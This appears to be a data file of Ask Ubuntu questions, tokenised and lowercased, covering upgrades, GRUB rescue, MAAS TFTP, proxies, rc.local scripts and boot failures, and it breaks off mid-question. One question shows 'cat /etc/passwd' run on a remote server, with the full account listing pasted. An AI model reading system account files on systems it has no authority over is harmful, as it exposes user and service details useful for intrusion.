hpfs/ntfs/exfat /dev/sda41 204802112 283592703 39395296 7 hpfs/ntfs/exfat /dev/sda42 204802112 283592703 39395296 7 hpfs/ntfs/exfat /dev/sda43 204802112 283592703 39395296 7 hpfs/ntfs/exfat /dev/sda44 204802112 283592703 39395296 7 hpfs/ntfs/exfat /dev/sda45 204802112 283592703 39395296 7 hpfs/ntfs/exfat /dev/sda46 204802112 283592703 39395296 7 hpfs/ntfs/exfat /dev/sda47 204802112 283592703 39395296 7 hpfs/ntfs/exfat /dev/sda48 204802112 283592703 39395296 7 hpfs/ntfs/exfat /dev/sda49 204802112 283592703 39395296 7 hpfs/ntfs/exfat /dev/sda50 204802112 283592703 39395296 7 hpfs/ntfs/exfat /dev/sda51 204802112 283592703 39395296 7 hpfs/ntfs/exfat /dev/sda52 204802112 283592703 39395296 7 hpfs/ntfs/exfat /dev/sda53 204802112 283592703 39395296 7 hpfs/ntfs/exfat /dev/sda54 204802112 283592703 39395296 7 hpfs/ntfs/exfat /dev/sda55 204802112 283592703 39395296 7 hpfs/ntfs/exfat /dev/sda56 204802112 283592703 39395296 7 hpfs/ntfs/exfat /dev/sda57 204802112 283592703 39395296 7 hpfs/ntfs/exfat /dev/sda58 204802112 283592703 39395296 7 hpfs/ntfs/exfat /dev/sda59 204802112 283592703 39395296 7 hpfs/ntfs/exfat /dev/sda60 204802112 283592703 39395296 7 hpfs/ntfs/exfat
504842	reinstalling ubuntu with wubi to repartition	so , here 's the issue : my ubuntu partition is too small . i was running 12.04 and went to 13.04 but lost support and disk space in the process . so , i figured i could just log back onto windows ( i dual boot ) and reinstall with `` wubi '' because i still have bios . so my questions are.. do i have to manually remove ubuntu first ? will reinstalling it over the current version repartition my drive ? or what ? i do n't feel super safe repartitioning it manually as i do n't know what to do . any help is greatly appreciated !
504844	error : invalid arch-independent elf magic	i have just installed ubuntu desktop 13.10 on my acer netbook .now when i m booting its showing : error : invalid arch-independent elf magic enterin rescue mode ... .. grub rescue > what do i do : ( thnx
504846	upgrading from 12.04.3 lts to 14.04.1 lts failure	this has probably been asked millions of times already , but i 'm struggling to update my ubuntu system from lts to lts , now that the upgrade to 14.04.1 is out . my system keeps notifying me to upgrade to the latest release , claiming that your current hardware enablement stack ( hwe ) is going out of support on 2014-08-07 . after this date security updates for critical parts ( kernel and graphics stack ) of your system will no longer be available.` however , when i run sudo do-release-upgrade , ubuntu says i have no updates available . in addition , changing the prompt parameter in /etc/update-manager/release-upgrades to prompt=normal instead of prompt=lts throws the following error : checking for a new ubuntu release 404 not found [ ip : 91.189.91.14 80 ] err upgrade tool 404 not found [ ip : 91.189.91.14 80 ] fetched 0 b in 0s ( 0 b/s ) warning : root : file 'quantal.tar.gz.gpg ' missing failed to fetch fetching the upgrade failed . there may be a network problem . this seems weird to me as quantal is n't even the current release , so i do n't know why the system would be looking for it . people have suggested appending the -d flag to the do-release-upgrade command , but the documentation says that this will install the development version of 14.04 which i do n't want . any help would be appreciated to get me around this roadblock .
504847	ubuntu 14.04 and xampp	installed xampp 1.8.3 on ubuntu14.04 on a laptop . i want to access files on this xampp from my desktop . what things do i need to do all this stuff . for example i want to put ubuntu.iso setup file in htdocs folder and then download this setup file from my desktop . how do connect from my desktop to this xampp to achieve this ? i have a lan cable and also a bsnl wifi router .
504848	ubuntu 14.04 maas tftp config file location ?	so i have been dipping my toes into the awesomeness that is maas , but i am running into trouble . background : i am trying to set up a maas/juju test cluster using virtualbox vms on a windows desktop . i have the cluster controller built with the initial primary interface on a bridged interface so that i can actually access the web interface , but i want to have a separate network that the controller can fully manage . to this end , i set up a nat network where the nodes will live . the controller then got a second interface ( eth1 ) on the nat network . the current problem is the tftp timeouts when the node is trying to pxe boot . i chased this down to the tftp daemon running on the wrong interface , so i need to change that . i tried changing the 'generator ' value in /etc/maas/pserv.yaml [ 1 ] but that does not appear to have changed anything . i dpkg-reconfigure on both maas-region-controller and maas-cluster-controller to update them to the correct ip , but still the tftp listener is starting on the wrong one [ 2 ] . is there some additional configuration file that i am missing ? thanks [ 1 ] # # # # provisioning server ( pserv ) configuration . # # # # where to log . this log can be rotated by sending sigusr1 to the # # running server . # # logfile : `` pserv.log '' logfile : `` /var/log/maas/pserv.log '' # # oops configuration ( optional ) . # oops : # # directory in which to place oops reports . must not contain any files # or directories other than what the oops machinery creates there . # # directory : directory : `` /var/log/maas/oops '' # reporter : reporter : `` maas-pserv '' # # message broker configuration ( optional , not currently used ) . # broker : # host : `` localhost '' # port : 5673 # username : < current user > # password : `` test '' # vhost : `` / '' # # tftp configuration . # tftp : # the `` root '' setting has been replaced by `` resource_root '' . the old setting # is used one final time when upgrading a pre-14.04 cluster controller to a # 14.04 version . after that upgrade , it can be removed . # # resource_root : /var/lib/maas/boot-resources/current/ # port : 69 # # the url to be contacted to generate pxe configurations . generator : http : //10.5.5.2/maas/api/1.0/pxeconfig/ [ 2 ] 10.5.5.2 is the interface on the nat network ( good ) 10.4.2.152 is the interface on the bridged interface ( bad ) from /var/log/maas/pserv.log 2014-07-31 01:42:58-0400 [ - ] starting factory < httpclientfactory : http : //10.5.5.2/maas/rpc/ > 2014-07-31 01:42:58-0400 [ - ] starting factory < httpclientfactory : http : //10.5.5.2/maas/rpc/ > 2014-07-31 01:42:58-0400 [ httppagegetter , client ] stopping factory < httpclientfactory : http : //10.5.5.2/maas/rpc/ > 2014-07-31 01:42:58-0400 [ httppagegetter , client ] stopping factory < httpclientfactory : http : //10.5.5.2/maas/rpc/ > 2014-07-31 01:43:05-0400 [ - ] tftp starting on 69 2014-07-31 01:43:05-0400 [ - ] tftp starting on 69 2014-07-31 01:43:05-0400 [ - ] starting protocol < tftp.protocol.tftp instance at 0x7f81865aa0e0 > 2014-07-31 01:43:05-0400 [ - ] starting protocol < tftp.protocol.tftp instance at 0x7f81865aa0e0 > 2014-07-31 01:43:05-0400 [ - ] tftp listener started at 10.4.2.152:69 2014-07-31 01:43:05-0400 [ - ] tftp listener started at 10.4.2.152:69
504856	c++ mounting samba share with glibmm	i 'm trying to mount samba shared folders with c++ . i found that with glibmm library i can do that , but i ca n't find any examples or tutorials . somebody could post some example code ? thanks .
504858	ubuntu 14.04 as dom0 for xen 4.4 hangs on boot	i am trying to install xen on a fresh install of ubuntu 14.04 lts . however , after i install xen-hypervisor-amd64 , the system does not boot anymore , it hangs at this screen : if i boot it without xen , it boots up fine . how can i make it work ?
504859	ca n't open software center	i 'm running ubuntu 14.04 lts , and i can not open the ubuntu software center . i keep getting this error : bash : /usr/bin/software-center : /usr/bin/python : bad interpreter : no such file or directory i 've noticed the change when i updated python to version 3.4.1 , and ca n't figure out how to fix this problem . can someone explain to me what i 'm failing to understand ?
504863	why does what the updater tell me vary ?	i have updates set to run immediately : why do i sometimes see this window , with `` updates are ready to install '' : and sometimes see this , with `` x.x mb to download '' :
504864	how to troubleshoot the gnome classic session ?	i have installed ubuntu gnome 14.04 and the gnome 3 stable + next + staging ppas . so i have gnome 3.12 installed and it works ok apart from one issue : in gdm i have the gnome and gnome classic sessions . if i choose to start the default gnome session it loads gnome shell and works ok , but if i choose gnome classic all i get is the gdm wallpaper and the mouse , no gnome shell with the 2 panels and default shell extensions for this session . afterwards i need to switch to tt1 and reboot or kill gdm . if i run startx gnome-classic-session from tty1 it loads ok but logging in from gdm fails . it worked sometime ago , just not now . i tried deleting all gnome config files in my home directory but did n't work . this is not for the gnome flashback session , it 's for the new classic session using gnome shell . any help ? if anybody needs me to provide more info just ask away : )
504866	deleting multiple name-sharing folders with one command	i want to delete one hidden folder from multiple locations at the same time using a single command . it 's located on multiple locations ( about 100 ) . is there any command which helps to delete this fast ?
504867	ca n't upgrade from ubuntu 10.10 to latest version	i 'm using ubuntu 10.10 . i want to upgrade it to the latest version but i 'm just unable to do so . when i press alt+f2 and write upgrade-manager-c-d and run it , it says error stating file '/home/ann/upgrade-manager- c-d ' : no such file or directory` what should i do ?
504869	can not find thin client manager in edubuntu 14.04	based on suggestions provided by experts , i installed edubuntu 14.04 and configured ltsp . the client boot up and everything works fine . but the ubuntu update forum says thin client manager for trusty has n't been released yet ? so , there 's no way i can manage my clients in trusty ? do i have do downgrade to edubuntu 12.04 ? if there 's any alternative , kindly suggest . thanks .
504871	is there software running under ubuntu , that would allow me to write a story in an individual song format ?	i 've returned to rewriting a story that i began in september 1978 , in the format of individual songs . the story , is told through the lyrics of each song . after all of these years of working on revising it here and there , i 've finally given it an ending and am now adding more songs to tell the rest of the story between the beginning and end of it . i 'm currently writing and storing each of the song 's lyrics in a private forum of mine at my web server , as well as libreoffice , for printing copies of the song 's overall index as well as the songs . what i would like to have software to allow me to do is : view a time line for the story have a repository for character / events informational bits something similar to 'postit notes ' that i can write ; paste somewhere ; remove when necessary have clickable links to various areas within the story / songs ( as in urls as far as webpages goes ) formatting and publishing are n't big worries for me , as i 'm writing the story and songs to entertain myself only . : ) a really big bonus to me , would be software that is runnable on linux and macos as well . : d ( linux running on my main computer being the preference , at least . ) help / suggestions in any way would be greatly appreciated . : ) thank you greatly . : ) ryk
504876	no new mail notification in thunderbird	i am using thunderbird 31 on ubuntu . i set up my accounts and then i closed thunderbird . but i 'm not getting any notification . is there any add-on i need ?
504879	dropbox - ubuntu 14.04lts	in the last few days i have noticed an oddity with the dropbox folder in the home directory . i can not be certain whether it is ubuntu or dropbox influenced hence the question here in case someone else has experienced it or can offer advice . a file .dropbox ( openable with geddit ) which contains some lines of text : - ( dp1 vtag p2 s'dropbox' p3 svns p4 l113047945l s. and a folder .dropbox.cache which itself contains another folder prefetch_cache which does n't contain anything appears in the dropbox folder which is used to sync with dropbox . when closing down my pc last night ( as the previous night ) these files/folders were removed by me from the > home > dropbox folder . this morning , on switching on the pc , i checked the > home > dropbox folder to see that the files had returned . they are date/time stamped the time i switched my ubuntu machine on . i then checked my dropbox account on the web by launching the dropbox website from the dropbox icon at the top of the screen and bizarrely these files/folders are not shown to be present - effectively invisible to dropbox itself . yesterday , following researchon this site , i opened a terminal and typed : `rm -r ~/dropbox/.dropbox.cache/*` this does not seem to have have had a desirable effect as evidenced by the same problem appearing this morning . this is not affecting my installation in any other way , just a curious annoyance deserving of some attention to get to the bottom of it . all suggestions gratefully received .
504882	alsa driver update in client machine without make	i have a linux system and updated alsa from 1.0.23 to 1.0.25 , it works as expected . steps which i performed to compile : ./configure make make install now , i have 100 's of client machines in which i need to deploy this alsa update . but , these machine does not have make/setup tools install . to deploy this update what is the best way ? i even tried creating a package using checkinstall . so , with created package i deployed it in 5 machines , in 3 machines the driver got updated and 2 machines reports no information on soundcard . am i missing something .
504884	ubuntu 14.04 installer crashes when `` creating user ... ''	after managing to sort out my partitions , i asked here , i tried installing and it asks me for a username and password , then it start installing . about a quarter of the way through it says creating user ... , then it crashes . after the crash it opens a window with the title problem in ubiquity and it says : the problem can not be reported . this is not an official ubuntu package . please remove any third party package and try again . but i installed ubuntu from their website , what is going on ? edit : i read this , and checked my disc and it 's fine . so it' s not the problem ...
504888	how to post a http form on boot ? maybe by running a php script ?	i am using ubuntu server 14.04 on my server . i have a php file that contains some script/code that i want to run when i turn my serveron . i want to run this xxxxxx.php file on my server startup before login not after login . i didnt have any desktop so tell me the process through terminal . my desired php file that i want to run is in /var/www/xxxxxx.php folder . now can i do it ? edit : my xxxxxx.php contain the following codes ... < ? php $ externalip = file_get_contents ( 'http : //phihag.de/ip/ ' ) ; ? > < form action= '' iframe.php '' method= '' post '' enctype= '' plain '' id= '' theform '' > < input type= '' text '' name= '' my_ip '' value= '' < ? php echo $ externalip ; ? > '' / > < input type= '' submit '' value= '' send '' / > < /form > < script type= '' text/javascript '' > window.onload = function ( ) { var form = document.getelementbyid ( `` theform '' ) ; form.submit ( ) ; } < /script >
504890	windows or ubuntu . comparison	is ubuntu better or windows better as os ? i 'm confused . and if ubuntu is better then how can i download the latest ubuntu ?
504900	no unity panels after changes in ccsm	i was trying to change some settings with the compizconfig settings manager but there was a conflict between some of the appearance options . unfortunately , now i ca n't see the unity dash or the panel at the top . i can see my desktop and open files and folders from there , but after i open them there is no button for closing or minimizing them . also shortcuts like ctrl+alt+t do n't work . can i do anything to bring my pc back to normal without reinstalling ubuntu ?
504901	how can i use vdpau directly ?	i got bumblebee working following this . after some meddling , that i can not fully reconstruct , but this helped , i got vdpau working : vdpau_driver=va_gl vdpauinfo display : :0 screen : 0 [ vs ] software vdpau backend library initialized libva info : va-api version 0.35.0 libva info : va_getdrivername ( ) returns 0 libva info : trying to open /usr/lib/x86_64-linux-gnu/dri/i965_drv_video.so libva info : found init function __vadriverinit_0_35 libva info : va_opendriver ( ) returns 0 api version : 1 information string : opengl/vaapi/libswscale backend for vdpau video surface : name width height types -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - 420 1920 1080 nv12 yv12 uyvy yuyv y8u8v8a8 v8u8y8a8 422 1920 1080 nv12 yv12 uyvy yuyv y8u8v8a8 v8u8y8a8 444 1920 1080 nv12 yv12 uyvy yuyv y8u8v8a8 v8u8y8a8 decoder capabilities : name level macbs width height -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - h264_baseline 51 16384 2048 2048 h264_main 51 16384 2048 2048 h264_high 51 16384 2048 2048 output surface : name width height nat types -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- b8g8r8a8 8192 8192 y r8g8b8a8 8192 8192 y r10g10b10a2 8192 8192 y b10g10r10a2 8192 8192 y a8 8192 8192 y bitmap surface : name width height -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- b8g8r8a8 8192 8192 r8g8b8a8 8192 8192 r10g10b10a2 8192 8192 b10g10r10a2 8192 8192 a8 8192 8192 video mixer : feature name sup -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- deinterlace_temporal - deinterlace_temporal_spatial - inverse_telecine - noise_reduction - sharpness - luma_key - high quality scaling - l1 - high quality scaling - l2 - high quality scaling - l3 - high quality scaling - l4 - high quality scaling - l5 - high quality scaling - l6 - high quality scaling - l7 - high quality scaling - l8 - high quality scaling - l9 - parameter name sup min max -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - video_surface_width - video_surface_height - chroma_type - layers - attribute name sup min max -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - background_color - csc_matrix - noise_reduction_level - sharpness_level - luma_key_min_luma - luma_key_max_luma - however , this is indirect through va-api , if i understand it correctly . mpv complains : vdpau_driver=va_gl mpv desktop/a.avi resuming playback . this behavior can be disabled with -- no-resume-playback . loading config '/home/drew/.mpv/watch_later/814c5b3e50b1cc117de3c8a23022f222' playing : desktop/a.avi [ stream ] video ( + ) -- vid=1 ( h264 ) [ stream ] audio ( + ) -- aid=1 ( aac ) [ vs ] software vdpau backend library initialized libva info : va-api version 0.35.0 libva info : va_getdrivername ( ) returns 0 libva info : trying to open /usr/lib/x86_64-linux-gnu/dri/i965_drv_video.so libva info : found init function __vadriverinit_0_35 libva info : va_opendriver ( ) returns 0 [ vo/vdpau ] vdpau is most likely emulated via va-api . [ vo/vdpau ] this is inefficient . use -- vo=opengl instead . using emulated hardware decoding api . trying to use hardware decoding . how much inefficient is it ? how can i make it use vdpau directly ? do i need to invoke mpv using optirun or not ?
504903	ubuntu 14.04 , nvidia corporation gf108m [ nvs 5400m ] laptop monitor problem	i am having a problem with making the laptop monitor work with the latest ubuntu . i am using optimus on lenovo t430 at the moment and when i try to activate the laptop monitor i get an extended virtual screen on which all my windows are also stretched and it looks like this : http : //screencloud.net/v/eee6 i tried using different drivers but with no avail . it only worked with the open source driver but then the mouse pointer was dissapearing , animations where choppy etc . etc . these are my installed drivers at the moment http : //screencloud.net/v/bwtm , even withouth the xorg-edgers repo i got the same results . it was working fine in 13.10 . thanks .
504908	unity sidebar and window frames disappear when i click on an icon with 2 or more dots ( multiple windows )	how can i restore unity to it 's original installation settings ? background in normal operation , unity shows up to three dots next to an icon on the left sidebar when the application has 2 more more windows open . e.g . multiple file manager windows or chrome etc . the problem usually , when i click on such icons with the dots , i am expecting the display to 'scale'/zoom-out to show the windows ( expose on the mac is similar ) . this used to happen but today what happens is that when i click on the icon , the ubuntu side-bar disappears and the frames around all the currently displayed windows disappear such that i can no longer move them . working toward a solution ... i know that this worked fine after installation , and for quite a while after that , several months in fact . what i 'm looking for is a sequence of commands that return the unity window system back to that state where it worked . a temporary work-around that i know of is setsid unity which i can issue in a terminal window ( if one happens to be open at the time the unity side bar and window frames disappear ) . what setsid unity does is restore the unity sidebar and side frames - but not permanently - in this case - because clicking on an icon with dots by it still causes unity to disappear . so in this case , setsid unity does not deal with the root cause . so , i 'm looking for something to permanently return the state of the unity window manager , so that this problem does not matter . note : i have not tinkered with my setup in this regard what-so-ever . the problem just seemed to happening . i can only guess that closing the lid of my laptop put it into standby which caused some kind of upset ( usually it 's fine ) .
504910	keyboard input control and sound controls not working kubuntu 14.04	i tried kubuntu for a month now , and suddenly i 'm having trouble with two components from the plasma toolbar : i ca n't switch the keyboard input from english to spanish . i had configured the shortcut ctrl-space , but now i ca n't even do that from the icon , or the system settings option . i also noticed i do n't have access to the system volume control anymore from my keyboard . i have tried switching the shortcuts back , but with no luck . does anybody know how to fix this ? thanks in advance , diego
504912	why does the `` watch '' command starts two `` watch '' and a `` sh '' process ?	when i tried to run watch ps command i got the following result : every 2.0s : ps thu jul 31 14:06:45 2014 pid tty time cmd 4329 pts/1 00:00:00 bash 4380 pts/1 00:00:00 watch 4381 pts/1 00:00:00 watch 4382 pts/1 00:00:00 sh 4383 pts/1 00:00:00 ps why does this command starts two watch processes instead of one ? also why does watch starts an instance of sh ?
504920	unity to xmonad switching disables sound	i mostly use xmonad . but whenever i log out of xmonad and login to unity and login back to xmonad the master volume is muted . i end up running amixer set master unmute . its just an annoyance and i could easily set this command to run every time i login but i am curious why this is happening .
504922	need to update /etc/hosts every time i connect to network because of dynamic ip	every time i connect to the network at work my device gets a new ip address which makes it /etc/hosts/ invalid and my hostname becomes unreachable . i was looking for a way to set /etc/hosts automatically every time i reconnect and i came across dhclient-scrip . i am pretty new to ubuntu world and honestly i got lost through all this : ) all i need is just to update the ip of my local hostname when my local ip changes . thanks edit : here is my /etc/hosts 128.141.239.50 mtahawi.comp.com mtahawi 127.0.0.1 localhost 127.0.1.1 mtahawi so the problem is : the ip i am mapping to my hostname mtahawi.comp.com is changing when i reconnect . i forgot to say i am using a wifi .
504925	how to align desktop icons with consistent icon sizes and short file names ?	there was a previous question similar to this - but no answers . i find it very annoying that the icons on the desktop are not aligned in a proper grid . the icon sizes are not consistent and longer file names are shown on multiple lines , this is just plain ugly and annoying if i have many items on the desktop . also , the keep aligned option does n't help to align horizontally . is there a way to override this , to have same icon size and limit the file name shown so that it looks perfectly aligned ? i 'm using ubuntu 12.04 .
504926	xubuntu and xubuntu-desktop	is ubuntu+xubuntu-desktop exactly the same as installing xubuntu from the iso ? if not , what are the differences ?
504928	how to check which openssl version is use by apache on ubuntu 12.04	i have installed ubuntu12.04 on my machine and it got heartbleed version of openssl 1.0.1 . so i uninstalled openssl 1.0.1 and install new 1.0.1g version by refering this link . now i want to confirm that the `` apache 2.2.22 '' available on ubuntu 12.04 is using 1.0.1g and not 1.0.1 version of openssl . how will i confirm this ?
504929	setting proxy in ubuntu terminal - proxy having special characters	i am trying to set proxy for a ubuntu server 12.04 . our proxy user name contains in the format : companyname\username and password like : $ test i tried to set proxy like this : export http_proxy='http : //companyname\username : $ test @ proxy.company.com:8080/ ' but when i run any commands which require internet , like sudo apt-get etc , still i am getting error , 407 proxy authentication required . as far as i am aware the above command should be correct . i searched lot and got above syntax , but not sure how to deal with proxy username containing like above . can anyone guide me ?
504938	grub problem after installation	i wanted to install ubuntu to my fujitsu desktop pc so i created a live usb , booted it and clicked on install . i did n't notice it was installing to my 500 gb portable hdd as it had the most free space . it created a new partition and then finished the installation . after restarting , my pc says the ( partition ) can not be found and so enters grub rescue . apparently ubuntu created an entry in the grub menu but it ca n't find the hdd on boot . my pc and all files are intact but windows is n't booting , and my bios is locked with a password so i can not change bios settings . pc specs : 1.87 gb ram 3.6 ghz pentium ( dual core ) processor phoenix bios 320 gb hitachi hdd 500 gb toshiba portable hdd
504942	how to find out which software is opened by which command ?	i am new to ubuntu . i want to use the terminal to open different softwares . instead of asking everytime which softwares is opened by which command i want to know what is the process to find out which command opens which software .
504944	ssh login without password not working from rc.local	i have created a bash script as follows and saved it as /usr/bin/db.sync.sh : # ! /bin/bash rsync -ar -- delete /files/database_backups slyme @ 192.168.1.4 : /users/slyme/documents/server_backups i have generated the necessary pair of authentication keys to make this work without the need to enter a password . when i run the command directly it works ( hurrah ! ) . i have added the following to `/etc/rc.local ' : /usr/bin/db.sync.sh > > /files/database_backups/db-sync.log.txt 2 > & 1 when i restart the machine this script fails and the log file suggests that the process asks for a password which , of course , it does n't get so it fails . if i run /etc/rc.local from the command line then , sure enough , i get asked for a password and when i enter it the script works . anyone got any ideas why the script needs a password when run from rc.local even though it does n't need a password when run directly ?
504946	installing jce locally on lubuntu machine	i 'm new to lubuntu ( linux ) systems , and i 'm trying to get a copy of the program called jce ( a protein structure alignment tool by combinatorial extensions ) and install it locally on my lubuntu machine . can anyone guide me through the process of installation ? the software is provided here and i have downloaded the package from here . i do n't know how to proceed from this point to install the software package on my system .
504948	apache2 and php error logging	i 've been running a local apache2 on a ubuntu 12.02 lts with the latest php version installed . i do need to debug some wordpress code to find out why certain values are not set in the database . i have enabled the apache2 logging as well as the wordpress log , but the apache2 file is almost empty and not all error thrown are recorded . is there any specific location and / or setting i should check ?
504954	not able to run matlab 2013a on ubuntu 14.04	i must begin by saying i am new to ubuntu . i have downloaded and installed matlab 2013a using the java download manager . i have installed it in /home directory . however i am not able to run the software at all . i do not know what to do . please do help . thank you .
504962	questions about reinstallation	i reinstalled ubuntu and got a system without internet . after deleting all types of drivers and putting important drivers and resetting network , it worked . recently , i installed pantheon and mate , and they thrashed unity . i removed all of them , and reinstalled unity , it did n't work . i installed the ubuntu-gnome-desktop meta package and installed gnome 3.12 from the staging ppa . attempted a downgrade to 3.10 and it never worked . a destroyed apt and ubuntu install , which was converted to ubuntu gnome , missing unity and a stable system , i decided to fix this up . i used to run ubuntu 14.04.1 , now ubuntu gnome 14.04.1 . i have an ubuntu 14.04.1 live cd . so here are my questions . 1-i know about a reinstall while keeping data option in ubiquity , but is there an option to switch over remixes , for example kubuntu to xubuntu and vice versa ? 2-if there is such an option , will it replace gnome with unity wherever possible , just keep my data ? i do not care much about programs , i will backup /usr/share/applications/whatever icons i created and /opt and use aptik for the rest , but it would be more convenient for me . 3-if there is not such an option , what all do i backup , other than the ones mentioned above ? 4-which one method is more recommended , in-place or fresh with backup and restore install ? please help me , as my system is strangely unstable .
504963	shortcut for dash and ccsm menu	i 'm new to ubuntu and was looking in the ccsm . i think i have disabled something as now there is no apps/programs/icons down the side and no menu across the top of screen to minimise or exit a program . how do i get back to the dash and ccsm menu if i can see it on the screen ? is there a keyboard shortcut ?
504966	screen flicker on mac mini 5,3	i have a screen flicker issue on my mac mini with intel hd graphics 3000 512 mb . it appears on multiple screens and via both hdmi and dual link dvi over the display port . it does not seem to occur if booting only os x for a period of time , but it persists into os x after it occurs in ubuntu . turning off the computer for a long period of time seems to help . i have re-installed thermal paste and it does not seem to get very hot ( anymore ) . i have upgraded to 14.04 and boot via efi . it can also be stopped for a short time by unplugging and reconnecting the display . also , it only flickers in black areas ( right now ) . right now , my browser window is clear , but if i minimize it , the black desktop will flicker .
504970	can not mount virtualbox folder in fstab	i 've just upgraded my vm from ubuntu server 12.04 to 14.04 . i used to mount my data folder through fstab as follows : datafolder /mnt/datafolder vboxsf uid=106 , gid=113 , dir_mode=0770 0 0 i had nothing in my rc.local , nor anything in my /etc/modules ( as per some solutions on this site ) . when i upgraded to 14.04 this all stopped working . i could manually mount the share using : mount -t vboxsf datafolder /mnt/datafolder however , on boot i would get an error . i know this question has been asked a lot , but none of the solutions seem to work for me .
504971	is it possible for users not to be in passwd ?	so i have a shell on a remote server . [ alexandros.dimos @ fep-62-1 ~ ] $ whoami alexandros.dimos [ alexandros.dimos @ fep-62-1 ~ ] $ cat /etc/passwd this too long the point is my user is not there [ alexandros.dimos @ fep-62-1 ~ ] $ uname -a linux fep-62-1.grid.pub.ro 2.6.32-431.5.1.el6.x86_64 # 1 smp tue feb 11 13:30:01 cst 2014 x86_64 x86_64 x86_64 gnu/linux from this uname command i ca n't even understand what kind of linux server it is . can someone explain me how is this possible and where can i read more about this kind of server ? edit : the passwd file root : x:0:0 : root : /root : /bin/bash bin : x:1:1 : bin : /bin : /sbin/nologin daemon : x:2:2 : daemon : /sbin : /sbin/nologin adm : x:3:4 : adm : /var/adm : /sbin/nologin lp : x:4:7 : lp : /var/spool/lpd : /sbin/nologin sync : x:5:0 : sync : /sbin : /bin/sync shutdown : x:6:0 : shutdown : /sbin : /sbin/shutdown halt : x:7:0 : halt : /sbin : /sbin/halt mail : x:8:12 : mail : /var/spool/mail : /sbin/nologin uucp : x:10:14 : uucp : /var/spool/uucp : /sbin/nologin operator : x:11:0 : operator : /root : /sbin/nologin games : x:12:100 : games : /usr/games : /sbin/nologin gopher : x:13:30 : gopher : /var/gopher : /sbin/nologin ftp : x:14:50 : ftp user : /var/ftp : /sbin/nologin nobody : x:99:99 : nobody : / : /sbin/nologin dbus : x:81:81 : system message bus : / : /sbin/nologin usbmuxd : x:113:113 : usbmuxd user : / : /sbin/nologin avahi-autoipd : x:170:170 : avahi ipv4ll stack : /var/lib/avahi-autoipd : /sbin/nologin vcsa : x:69:69 : virtual console memory owner : /dev : /sbin/nologin rpc : x:32:32 : rpcbind daemon : /var/cache/rpcbind : /sbin/nologin rtkit : x:499:496 : realtimekit : /proc : /sbin/nologin saslauth : x:498:76 : '' saslauthd user '' : /var/empty/saslauth : /sbin/nologin postfix : x:89:89 : :/var/spool/postfix : /sbin/nologin ntp : x:38:38 : :/etc/ntp : /sbin/nologin avahi : x:70:70 : avahi mdns/dns-sd stack : /var/run/avahi-daemon : /sbin/nologin rpcuser : x:29:29 : rpc service user : /var/lib/nfs : /sbin/nologin nfsnobody : x:65534:65534 : anonymous nfs user : /var/lib/nfs : /sbin/nologin openvpn : x:497:495 : openvpn : /etc/openvpn : /sbin/nologin haldaemon : x:68:68 : hal daemon : / : /sbin/nologin pulse : x:496:494 : pulseaudio system daemon : /var/run/pulse : /sbin/nologin gdm : x:42:42 : :/var/lib/gdm : /sbin/nologin sshd : x:74:74 : privilege-separated ssh : /var/empty/sshd : /sbin/nologin tcpdump : x:72:72 : :/ : /sbin/nologin razvan : x:500:500 : razvan dobre : /home/razvan : /bin/bash apache : x:48:48 : apache : /var/www : /sbin/nologin nagios : x:495:489 : :/var/spool/nagios : /sbin/nologin nrpe : x:494:488 : nrpe user for the nrpe service : /var/run/nrpe : /sbin/nologin mapred : x:202:123 : hadoop mapreduce : /tmp : /bin/bash hdfs : x:201:123 : hadoop hdfs : /tmp : /bin/bash oprofile : x:16:16 : special user account to be used by oprofile : /home/oprofile : /sbin/nologin qemu : x:107:107 : qemu user : / : /sbin/nologin dhcpd : x:177:177 : dhcp server : / : /sbin/nologin and after [ alexandros.dimos @ fep-62-1 ~ ] $ lsb_release -a lsb version : : core-4.0-amd64 : core-4.0-noarch : graphics-4.0-amd64 : graphics-4.0-noarch : printing-4.0-amd64 : printing-4.0-noarch distributor id : scientific description : scientific linux release 6.2 ( carbon ) release : 6.2 codename : carbon
504977	ubuntu 13.10 has suddenly failed to boot !	yesterday evening , i do n't know what happened but my system ( ubuntu 13.10 ) did n't boot . since then i tried many times but the same issue as i explain below . see i boot my system . grub menu comes ; i select ubuntu ( to boot ) ; then as normal the ubuntu symbol comes but it takes a long time there & then prompt appears in a terminal with the messages as shown below : gave up waiting for root device . common problems : - boot args ( cat /proc/cmdline ) -check rootdelay = ( did the system wait long enough ? ) -check root = ( did the system wait for the right device ? ) - missing modules ( cat /proc/modules ; ls /dev ) alert ! /dev/disk/by-uuid/da5b7ccd-e161-4460-4012-1b54eaf31faa does n't exist . dropping to a shell ! busybox v1.20.2 ( ubuntu 1:1.20.0-8.1 ubuntu1 ) built-in shell ( ash ) enter 'help ' for a list of built-in commands . ( initramfs ) _ from the message , i felt to check whether the root device ( /dev/sda5 is root partition in my case ) is o.k . or not . i booted live usb of ubuntu 14.04.1 ( that i downloaded yesterday ) . i mounted all the partitions of the hard-disk installation having ubuntu 13.10 ( /home , / , /var/ , /boot , /tmp ) . to my surprise , root partition did n't contain anything but others had data . root partition was empty ! ! ! ! as the above output mentioned alert ! /dev/disk/by-uuid/da5b7ccd-e161-4460-4012-1b54eaf31faa does n't exist , i thought to check if that 's the uuid of the root partition & that partition is what it is saying that does n't exist ! ubuntu @ ubuntu : ~ $ sudo lsblk -o name , mountpoint , label , size , uuid name mountpoint label size uuid sda 111.8g ├─sda1 system reserved 100m 6e60f4d460f4a3cd ├─sda2 c_drive 31.2g 0e441c8f441c7ba1 ├─sda3 d_drive 36.9g 100eeceb0eeccb34 ├─sda4 1k ├─sda5 root 14g 5dd68245-345c-44f4-8c22-a6779472e388 ├─sda6 boot 314m 84e87924-cc93-45d9-82d3-39a925110a2b ├─sda7 2.1g ├─sda8 var 1.9g f607795c-5f8c-4c14-a4d8-2d0e71d0319a ├─sda9 tmp 1.9g a3f24d77-7c45-4a3d-b153-478d8261c338 └─sda10 home 23.7g 735de76f-65f3-4963-ad0e-44a4a2b34e97 sdb 1.9g └─sdb1 /cdrom 1.9g bc426250-9c5d-4d9e-8b15-43bafa7bb4ac sr0 1024m loop0 /rofs 952m ubuntu @ ubuntu : ~ $ and 